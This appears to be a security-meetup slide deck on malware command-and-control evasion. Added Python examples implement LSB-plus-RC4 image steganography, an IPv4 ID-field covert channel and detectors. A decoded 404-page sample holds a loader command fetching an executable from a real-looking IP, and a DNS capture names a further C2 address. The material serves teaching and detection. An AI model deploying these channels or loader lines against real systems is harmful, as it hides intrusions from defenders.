
Null meetup, 11 June: Malware CnC: Advanced Evasion Techniques, by Avkash Kathiriya and Dhawal Shah


MALWARE COMMAND AND CONTROL: EVASION TACTICS AND TECHNIQUES

Avkash Kathiriya

Information Security Learner

Dhawal Shah

Information Security Learner

AGENDA

• CKC (Cyber Kill Chain) Revision

• What is Command and control?

• What is Malware CnC?

• Why CnC?

• Channels of CnC

• Some advanced CnC techniques

6/11/2016 MALWARE CNC BY AVKASH K & DHAWAL SHAH 2

./Shell> Cyber Kill Chain revision


Our focus in this session will be Command and Control.

What is Command and Control??


C:\ Command and Control > CnC.txt

Command

Control

The idea is to give commands that control your systems and accomplish your aim.


What is Malware CnC?

[Diagram: Attacker → Command and control server → Compromised system. Commands flow from the attacker through the CnC server to the compromised system; responses flow back along the same path.]


Why Malware CnC?

• Receive commands from the operator

• Send feedback to the operator

• Receive updates and modules from the operator

• Evade security controls:

– Intrusion detection

– Antivirus

– Incident response

– Forensic analysis

Evolution of Malware CnC


Evolution of CnC Techniques

[Timeline: early malware was mostly IRC-based; CnC techniques then evolved rapidly through P2P, DNS and HTTP channels, domain flux and tunnelling.]

Why this evolution?

The answer is to stay undetected, which creates the need for covert communication.

Covert communication?

• The capability to transfer information between two hosts that are not explicitly allowed to communicate.

• A mechanism for sending and receiving data between machines without alerting any firewalls or IDSs on the network.

• You want to communicate with someone without being observed.

• Cryptography/encryption alone is not good enough:

– You want to hide the fact that you are communicating at all.

– The best way is to hide the communication inside innocuous-looking network traffic or data.

– The firewall must let the traffic pass through, so the carrier has to be a protocol that is already allowed.

Covert communication?

[Diagram: a host on the internal network sends DNS requests and receives DNS replies through the perimeter; malicious DNS requests and replies travel the same path.]

It is a method of performing malicious communication over the legitimate, basic channels that you cannot block at the perimeter, e.g. DNS in this case.

How does Malware CnC happen?

Before that, let's first understand the basic user communication channels.

Channels of “User” communication

[Diagram: User → Endpoint, Email, Web, Network]

What about malware communication channels?

Just replace User with Malware!

Channels of “Malware” communication

[Diagram: Malware → Endpoint, Email, Web, Network]

Web

Web malware uses HTTP (port 80) and HTTPS (port 443).

Web CnC?

• Direct connection to the Internet on port 80

• Blocked in most enterprise environments, where outbound web traffic must go through a proxy

• Identify the proxy in use and route the web CnC through it

• The proxy needs authentication, which the malware can obtain anyway, since it runs in the context of a user who already has proxy access

• Reverse WWW shell

• Looks like an ordinary HTTP request from the client to a server on the firewall

• The server sends back HTML resources that the client interprets as shell commands

• E.g. GoToMyPC works on the same principle

Advanced Web CnC?

• Using HTTP GET and POST for communication

• HTTP tunneling

• Downloading information hidden in favicon.ico:

– Extract the hidden bytes using LSB steganography

– Decrypt them using RC4
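The two steps named above, LSB steganography and RC4, worked through end to end. This is an added example, not code from the deck or from any malware family: the "favicon" is a constructed 16x16 RGBA pixel buffer, the key and the configuration string are made up, and the 32-bit length prefix is a framing choice of this example, not a documented format.

```python
"""Added example: hide an RC4-encrypted config in the least significant
bits of an image buffer, then recover it the way a malware sample would.
Cover pixels, key and config are constructed for the example."""
import struct


def rc4(key: bytes, data: bytes) -> bytes:
    """RC4 keystream XOR (symmetric: same call encrypts and decrypts).
    RC4 is a broken cipher; it is here only because the slide names it."""
    S = list(range(256))
    j = 0
    for i in range(256):  # key-scheduling algorithm
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:  # pseudo-random generation algorithm
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def lsb_embed(pixels: bytes, payload: bytes) -> bytes:
    """Write a 32-bit big-endian length followed by the payload, one bit
    per cover byte, into the least significant bit of each byte."""
    framed = struct.pack(">I", len(payload)) + payload
    bits = [(b >> (7 - k)) & 1 for b in framed for k in range(8)]
    if len(bits) > len(pixels):
        raise ValueError("cover image too small for payload")
    out = bytearray(pixels)
    for idx, bit in enumerate(bits):
        out[idx] = (out[idx] & 0xFE) | bit
    return bytes(out)


def lsb_extract(pixels: bytes) -> bytes:
    """Read the length prefix from the first 32 LSBs, then that many bytes."""
    def read_bytes(offset_bits: int, n: int) -> bytes:
        value = bytearray()
        for b in range(n):
            byte = 0
            for k in range(8):
                byte = (byte << 1) | (pixels[offset_bits + b * 8 + k] & 1)
            value.append(byte)
        return bytes(value)

    length = struct.unpack(">I", read_bytes(0, 4))[0]
    if length > (len(pixels) - 32) // 8:
        raise ValueError("length field exceeds cover capacity")
    return read_bytes(32, length)


def recover_config(pixels: bytes, key: bytes) -> bytes:
    """Receiver side: extract LSB payload, then RC4-decrypt it."""
    return rc4(key, lsb_extract(pixels))


# Constructed cover: 16x16 pixels, 4 channels = 1024 bytes of "image" data.
COVER = bytes((i * 37 + 11) & 0xFF for i in range(16 * 16 * 4))
KEY = b"constructed-key"          # made-up key for the example
CONFIG = b"c2=http://example.invalid/gate.php;sleep=60"  # made-up config


def demo() -> bytes:
    stego = lsb_embed(COVER, rc4(KEY, CONFIG))
    # Only the LSB plane differs, so the icon renders identically.
    assert all((a & 0xFE) == (b & 0xFE) for a, b in zip(COVER, stego))
    return recover_config(stego, KEY)


if __name__ == "__main__":
    print(demo())
```

For an analyst the useful half is `lsb_extract`: a favicon whose LSB plane has noticeably higher entropy than the rest of the pixel data is the tell, and once the key is recovered from the sample the same RC4 routine decrypts the embedded blob.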

Steganography based Covert Channel

[Three image slides illustrating the steganography-based covert channel; no text content.]

Advanced Web CnC?

• YouTube as a malware CnC

[Diagram: Attacker and Endpoint exchanging data through YouTube]

Advanced Web CnC?

• HTTP error messages

HTTP/1.1 404 Not Found
Date: Mon, 9 Jul 2015 06:13:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.3.29
Vary: Accept-Encoding,User-Agent
Content-Length: 357
Connection: close
Content-Type: text/html; charset=utf8

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /XXX/YYY.php was not found on this server.<P><HR><ADDRESS></ADDRESS></BODY></HTML><!-- DEBUG: MTQyODUyMTUyMzcyOTk5MyNsb2FkZXIgaHR0cDovLzExMS4xNzkuMzkuODMvZ29sZGVuMy5leGUjMTQyODUxMjA2MTc1NDYzNSNyYXRlIDYwIwDEBUG-->

Decoded value (Base64 inside the HTML comment): 1428521523729993#loader http://111.179.39.83/golden3.exe#1428512061754635#rate 60#
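The response above, decoded programmatically. This is an added example, not the deck's code: it locates the `<!-- DEBUG: ... DEBUG-->` comment, strips whitespace and missing padding, Base64-decodes it and splits the result on `#`. The interpretation of the fields (timestamp, `loader URL`, timestamp, `rate N`) is read off the slide's own decoded sample, not from any published specification.

```python
"""Added example: pull a command hidden in the HTML comment of an HTTP 404
response. The response text is the one shown on the slide."""
import base64
import binascii
import re

SAMPLE_404 = (
    "HTTP/1.1 404 Not Found\r\n"
    "Date: Mon, 9 Jul 2015 06:13:37 GMT\r\n"
    "Server: Apache/2\r\n"
    "X-Powered-By: PHP/5.3.29\r\n"
    "Vary: Accept-Encoding,User-Agent\r\n"
    "Content-Length: 357\r\n"
    "Connection: close\r\n"
    "Content-Type: text/html; charset=utf8\r\n"
    "\r\n"
    '<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD>'
    "<TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>"
    "The requested URL /XXX/YYY.php was not found on this server.<P><HR>"
    "<ADDRESS></ADDRESS></BODY></HTML>"
    "<!-- DEBUG: MTQyODUyMTUyMzcyOTk5MyNsb2FkZXIgaHR0cDovLzExMS4xNzkuMzkuODMv"
    "Z29sZGVuMy5leGUjMTQyODUxMjA2MTc1NDYzNSNyYXRlIDYwIwDEBUG-->"
)

# Base64 text between the DEBUG markers; whitespace allowed because captures
# and copy-paste often wrap the line.
DEBUG_COMMENT = re.compile(r"<!--\s*DEBUG:\s*([A-Za-z0-9+/=\s]+?)\s*DEBUG-->")


def extract_hidden_command(response: str):
    """Return (decoded_text, fields) or None when no marker is present or
    the marker does not decode as Base64."""
    m = DEBUG_COMMENT.search(response)
    if not m:
        return None
    b64 = re.sub(r"\s+", "", m.group(1))
    b64 += "=" * (-len(b64) % 4)  # the sample omits padding
    try:
        raw = base64.b64decode(b64, validate=True)
    except (binascii.Error, ValueError):
        return None
    text = raw.decode("latin-1")
    fields = [f for f in text.split("#") if f]
    return text, fields


def parse_commands(fields):
    """Field layout inferred from the slide's sample, not a documented format:
    numeric fields are timestamps, 'loader <url>' and 'rate <seconds>' are
    commands."""
    cmds = {"timestamps": [], "loader": [], "rate": None}
    for f in fields:
        if f.isdigit():
            cmds["timestamps"].append(int(f))
        elif f.startswith("loader "):
            cmds["loader"].append(f.split(" ", 1)[1])
        elif f.startswith("rate "):
            cmds["rate"] = int(f.split(" ", 1)[1])
    return cmds


if __name__ == "__main__":
    text, fields = extract_hidden_command(SAMPLE_404)
    print(text)
    print(parse_commands(fields))
```

The detection angle is the comment's position: a stock Apache or PHP 404 page ends at `</HTML>`, so a Base64-looking comment after the closing tag of an error page is worth an alert on the proxy or IDS, and the Content-Length of the "error" page will be larger than the server's usual 404 body.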

Hiding commands in HTTP messages


Email

Email malware uses SMTP.

Email CnC?

• It's pretty simple: just use the SMTP channel for sending commands from your controller and receiving the responses

[Diagram: Attacker ↔ Email ↔ Endpoint; commands are sent through SMTP and responses are received through SMTP]

An evasion technique seen with this type of communication is the use of PowerShell.

Network

Network malware uses the network protocols themselves as the carrier.

Network CnC?

Types of covert channel communication at the network layer:

• Storage channels

– Hide data within unused TCP/IP packet header fields

• TCP flags field, TCP ISN, etc.

• Timing channels

– Modulate system resources (packet timing, rates) in such a way that a receiver can observe and decode them

– Port knocking, varying packet rates, etc.

Network CnC?

• Protocol tunneling:

– A protocol that carries the data of another protocol.

– Example: SSH

– SSH sets up an encrypted, authenticated connection between two computers.

– That connection can then carry insecure protocols such as FTP.

• Tunnel through any TCP/IP traffic

– Insert data in unused or misused fields of the protocol headers, such as:

– IP Identification

– TCP sequence number

– TCP acknowledgment number
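A storage channel in the IP Identification field, the first item in the list above, as an added example (not the deck's code and not a port of any named tool). Headers are built and parsed in memory; nothing is sent. The sender puts two payload bytes per packet into the 16-bit Identification field of an otherwise ordinary IPv4 header; the receiver validates the checksum and reassembles them. The addresses and the message are constructed.

```python
"""Added example: IPv4 Identification field as a covert storage channel,
plus a crude detector for it. Packets are built in memory only."""
import struct


def inet_aton(ip: str) -> bytes:
    return bytes(int(o) for o in ip.split("."))


def ip_checksum(header: bytes) -> int:
    """RFC 1071 one's-complement sum over 16-bit words."""
    if len(header) % 2:
        header += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(header) // 2), header))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_ipv4_header(src: str, dst: str, ident: int,
                      proto: int = 1, payload_len: int = 0) -> bytes:
    """Minimal 20-byte IPv4 header; 'ident' is the covert 16-bit value."""
    ver_ihl = (4 << 4) | 5
    hdr = struct.pack("!BBHHHBBH4s4s",
                      ver_ihl, 0, 20 + payload_len, ident, 0,
                      64, proto, 0, inet_aton(src), inet_aton(dst))
    csum = ip_checksum(hdr)
    return hdr[:10] + struct.pack("!H", csum) + hdr[12:]


def encode_message(msg: bytes, src: str, dst: str):
    """Sender: two message bytes per packet, zero-padded to even length."""
    padded = msg + (b"\x00" if len(msg) % 2 else b"")
    return [build_ipv4_header(src, dst, struct.unpack("!H", padded[i:i + 2])[0])
            for i in range(0, len(padded), 2)]


def decode_message(packets) -> bytes:
    """Receiver: verify the header checksum, read the ID field, drop the pad."""
    out = bytearray()
    for pkt in packets:
        if ip_checksum(pkt[:20]) != 0:
            raise ValueError("bad IPv4 header checksum")
        out += pkt[4:6]
    return bytes(out.rstrip(b"\x00"))


def suspicious_id_sequence(packets) -> bool:
    """Detector: most stacks use a simple counter for the ID field, so IDs
    that jump erratically and decode to printable ASCII are a flag.
    Heuristic only; randomised IDs (e.g. OpenBSD) will also trip it."""
    ids = [struct.unpack("!H", p[4:6])[0] for p in packets]
    if len(ids) < 2:
        return False
    deltas = [(b - a) & 0xFFFF for a, b in zip(ids, ids[1:])]
    counter_like = all(d == 1 for d in deltas)
    printable = sum(1 for i in ids
                    if 0x20 <= (i >> 8) <= 0x7E and 0x20 <= (i & 0xFF) <= 0x7E)
    return (not counter_like) and printable >= len(ids) * 0.75


if __name__ == "__main__":
    pkts = encode_message(b"whoami\n", "10.0.0.5", "192.0.2.10")  # constructed
    print(len(pkts), "packets ->", decode_message(pkts))
    print("flagged:", suspicious_id_sequence(pkts))
```

Two caveats a practitioner would add: the channel is fragile because NAT devices and some firewalls rewrite or normalise the ID field, and the detector's "counter-like" assumption is false for stacks that randomise IDs, so it belongs in a scoring model rather than a hard block.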

Network CnC?

• Hiding information in existing protocols such as HTTP, DNS and ICMP

• Pros/cons of each protocol

– HTTP is good for large data transfers, but more conspicuous

– DNS is not great for bulk data transfer, but good for C&C

– ICMP is good for C&C but is often blocked

• The author of The Rootkit Arsenal proposes writing your own TCP/IP stack using MS Windows NDIS, so that the traffic bypasses the host's own stack and whatever monitors it

• BitTorrent tracker protocol tunneling

Network CnC? Example: LOKI

The attacker installs the Loki server (a.k.a. lokid) on the victim and runs the Loki client on his own machine. Loki tunnels the attacker's commands:

– The attacker writes shell commands.

– The Loki client sends out several ICMP packets to the victim, each containing part of the command.

– The Loki server receives the ICMP packets, extracts the attacker's command and executes it.

– In reverse, the Loki server wraps the responses in ICMP messages and sends them to the Loki client, which displays them.

Port scanners or netstat cannot detect Loki since ICMP does not use ports. The only traces are the Loki server process running as root and the ICMP messages going back and forth.

Network CnC?

• ICMP covert tunnels

• Mechanism: use ICMP echo (ping) request/response packets as the carrier

• Tool: Ptunnel (http://www.cs.uit.no/~daniels/PingTunnel/PingTunnel-0.71.tar.gz)

ICMP Covert Tunnels

• Mechanism of the ptunnel tool [image slide]

• Wireshark capture of the ptunnel tool [image slide]

DNS Covert Tunnels

Mechanism of DNS Covert Channel - Feederbot

Normal:

;QUESTION
newcommunitybank.com. IN A
;ANSWER
newcommunitybank.com. 86400 IN A 74.54.82.153

Malicious:

;QUESTION
f16e180e9093c237ea31a4ab55ae7fac710a14e4972b30fdf4.google.com. IN ANY
;ANSWER
f16e180e9093c237ea31a4ab55ae7fac710a14e4972b30fdf4.google.com. 0 IN TXT "aYpYOb/6L5NRMxDRbwQDrVfPJDw5yogih+zlfj+lQpRDPZE4n1DWB0M/l0J6YDp88Vgm"

• 50-character system-dependent bot ID: f16e180e9093c237ea31a4ab55ae7fac710a14e4972b30fdf4

• RC4-encrypted bootstrap traffic, shown after decryption:

0000  8E 68 00 00 0B 00 00 00 17 00 00 00 39 34 2E 32  .h..........94.2
0010  33 2E 36 2E 36 37 00 69 6D 61 67 65 73 2E 6D 6F  3.6.67.images.mo
0020  76 69 65 64 79 65 61 72 2E 6E 65 74 2E 00 3C     viedyear.net..<

• Contains a referral to the next C2 server node, 94.23.6.67
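The normal and malicious records above, scored for the indicators that separate them: a long hex-looking first label, a rare query type (ANY/TXT), a TTL of 0 and a Base64-looking TXT payload. This is an added example, not the deck's code; the first two records are the slide's, the SPF lookup is constructed as a benign control, and the threshold of three indicators is a choice of this example.

```python
"""Added example: score DNS records for tunnelling indicators seen in the
Feederbot sample. Two records are from the slide; the SPF one is constructed."""
import math
import re

HEX_LABEL = re.compile(r"^[0-9a-f]{32,}$")
BASE64_BLOB = re.compile(r"^[A-Za-z0-9+/]{40,}={0,2}$")
RARE_QTYPES = {"TXT", "ANY", "NULL"}


def shannon_entropy(s: str) -> float:
    if not s:
        return 0.0
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def score_dns(qname: str, qtype: str, ttl=None, rdata: str = ""):
    """Return (score, reasons); one point per indicator. The caller picks
    the threshold, since any single indicator also occurs in benign traffic."""
    reasons = []
    first = qname.rstrip(".").split(".")[0].lower()
    if len(first) > 30:
        reasons.append("first label longer than 30 chars")
        # Entropy is only meaningful on long labels: a 16-char English label
        # such as "newcommunitybank" already exceeds 3.5 bits per char.
        if shannon_entropy(first) > 3.5:
            reasons.append("long first label with high entropy")
    if HEX_LABEL.match(first):
        reasons.append("first label is a long hex string (encoded ID or data)")
    if qtype.upper() in RARE_QTYPES:
        reasons.append("rare query type %s" % qtype.upper())
    if ttl == 0:
        reasons.append("TTL 0 (nothing is cached, every lookup reaches the server)")
    if rdata and BASE64_BLOB.match(rdata.strip('"')):
        reasons.append("rdata looks like a base64 blob")
    return len(reasons), reasons


# (qname, qtype, answer TTL, answer rdata)
RECORDS = [
    # from the slide
    ("newcommunitybank.com.", "A", 86400, "74.54.82.153"),
    ("f16e180e9093c237ea31a4ab55ae7fac710a14e4972b30fdf4.google.com.", "ANY", 0,
     '"aYpYOb/6L5NRMxDRbwQDrVfPJDw5yogih+zlfj+lQpRDPZE4n1DWB0M/l0J6YDp88Vgm"'),
    # constructed benign TXT lookup (SPF) as a control
    ("example.com.", "TXT", 3600, '"v=spf1 include:_spf.example.com -all"'),
]


def triage(records, threshold: int = 3):
    """Query names whose indicator count reaches the threshold."""
    return [q for q, t, ttl, rd in records if score_dns(q, t, ttl, rd)[0] >= threshold]


if __name__ == "__main__":
    for rec in RECORDS:
        print(rec[0], score_dns(*rec))
    print("tunnel candidates:", triage(RECORDS))
```

Per-record scoring catches an obvious sample like this one; real deployments add per-client aggregates (unique subdomains per parent domain per hour, total bytes in query names), because a tunnel that uses a short, non-hex alphabet defeats every single-record rule above except the TTL and volume.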

DNS Covert Tunnels

• Tool: OzymanDNS [image slide]

• Wireshark capture of OzymanDNS [image slide]

• Packet capture of OzymanDNS [image slide]

Endpoint

[Diagram: Malware → Endpoint via USB]

Endpoint CnC??

Endpoint CnC via USB

Not an actual CnC channel, but in this case the method of infection and communication was USB.

Conclusion

• CnC is key for any malware to sustain its foothold

• Techniques and tactics for hiding the CnC channel have evolved over time

• The idea is to hide in the mass of legitimate traffic and exploit the flaws in traditional communication channels

• Attackers stay connected with their targets and keep nurturing the malware they have planted

References

• Lockheed Martin, Cyber Kill Chain

• SANS Institute, Covert Channels

• Erland Jonsson, Introduction to Malicious Code

• Black Hat EU 2015, Hiding in Plain Sight

• Twitter : @avkashk

• Blog: www.avkashk.wordpress.com or LinkedIn Pulse (Avkash Kathiriya)


• Twitter:@shahdhawal
